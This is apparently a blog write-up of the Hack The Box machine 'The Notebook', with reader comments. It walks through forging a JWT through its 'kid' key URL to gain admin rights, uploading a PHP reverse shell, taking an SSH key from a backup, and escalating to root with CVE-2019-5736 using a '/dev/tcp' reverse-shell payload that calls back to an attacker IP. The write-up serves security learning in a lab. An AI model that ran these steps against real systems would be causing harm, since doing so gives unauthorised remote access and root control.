this is my first write-up give feed back and any queries pm me
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
WEB PAGE
10.10.10.230/register |
Register, Write notes, and it will assign a uuid and a cookie
after some research its using jwt authentication token
See,, Here is the cookie auth for jwt
Cookie: auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC45NDo3MDcwL3ByaXZLZXkua2V5In0.eyJ1c2VybmFtZSI6InRlc3QyIiwiZW1haWwiOiJ0ZXN0QGdtYWlsLmNvbSIsImFkbWluX2NhcCI6MX0.FRY5biWOI_Dxe1bik32FCXLYF8znXsXpuDHwN0WloiioiwDiUkIgjpNWl9wsBLbcYWGDUgVw9PZdVSsRUdhsrbXK_LxqMRMExds7NXldV7QOGLjZ50Xwf-fH70SAJaVk-gxQ2fNn2jGd-c1HFWWFyyqcUMoNud9fZqXgINNSidp6pA0UVc2gQYDn8zt31uu-22c8Q9lV-9Tx7wudgy-xyHgR38Ols9u4SYVP30FGJnPJPe2qjvqdQ2JyJZcu9tQAlTJaOz28IYzJ_LNhHexn2PxCLgOJuKsqcnr102X-okRRDmIgUi1UzDRXYkGQmJv_UGvKwzbExFhySmMEJT0IndYXlc-Epirxl70XdhXjQ9iX37H4-Yjm641vGVhh41LKf-guRBizXkLR06P9N-DPds-3nv_Xfj3oOBTzfrUxUovo_mbLIse-159IDpk5c8QAN-JUtTpOXi0uJILXK_xhIrEIBH-Kp3rGtzuD5ClwekIyvYQAwBrw_RsuZV4ctgpektWyqQyw2RLLaNBG7lCd2f-Qsm23kzW8rFrTJ04VIk9nd6oTUzleeEr2Q5aBltr7sa_YMNWYp7VoRyiReim5lLD9X7ssIxDM0EtKKjccc0R6R23RHWa8m2uhY0nvkKE6A9B4RIE6haymzAspd6wIpkoNCusDCIvxb_GUuSY-0R8;
Here is the website for decode jwt token -- https://jwt.io/
after decode the 'Cookie: auth=' we get something intersting
its using keys for the auth (prob. gpg keys) and kid at port 7070
for reference here
On Researching and from the jwt.io itself,we can create out own token for auth..Lets create one and exploit it.
create a new rsa key pair here
And Next Edit Header , add your tun0 ip on localhost and change "admin_cap": 0 to "admin_cap": 1
Add your jwtRS256.key.pub and jwtRS256.key, and change jwtRS256.key name to 'privKey.key'
Finally The Payload Look like
It should look like this, 'Signature verified'
Change the/Replace the token using Burp, and our priv key is been picked
And now we are admin, (but the thing is we have to change the cookie every time we
switch the pages or send some requests)
Admin pannel |
Upload Php-reveshell And Access 10.10.10.230/shell.php
Boom!!
Wet get a www-data revershell
USER FLAG
go /var/backup/
Download home.tar.gz in our local machine
tar -xvf home.tar.gz
cd home
cd noah
ls -la
cd .ssh
cat id_rsa
RSA Key for Noah
Here is the User flag
user flag And run Sudo -l |
ROOT/Privilege Escalation
docker exec
Searching For the exploit
https://github.com/Frichetten/CVE-2019-5736-PoC
git clone this
now there change the exploit(main.go) in var payload =
for getting the reverse shell
var payload = "#!/bin/bash \n echo 'bash -i >& /dev/tcp/10.10.14.96/4242 0>&1'
> /tmp/rev.sh && chmod +x /tmp/rev.sh && bash /tmp/rev.sh"
build it go built main.go
Listen nc on your local machine
now go to the machine, get into the docker container
sudo /usr/bin/docker exec -it webapp-dev01 bash
and in /tmp/ wget the main executable.
give executable permission and run the file
and simultaneously open second ssh session, and ssh into it
and run sudo /usr/bin/docker exec -it webapp-dev01 sh
Don't forget to nc listen on our local machine
BOOOOm!! we Get ROOT shell
I HOPE YOU LEARN SOMETHING :)
Enna thambi ethu
ردحذفHack the box The Notebook writeup thambi
حذف#htb #thenotebook
Super bro 💯
ردحذف❤️❤️
حذفإرسال تعليق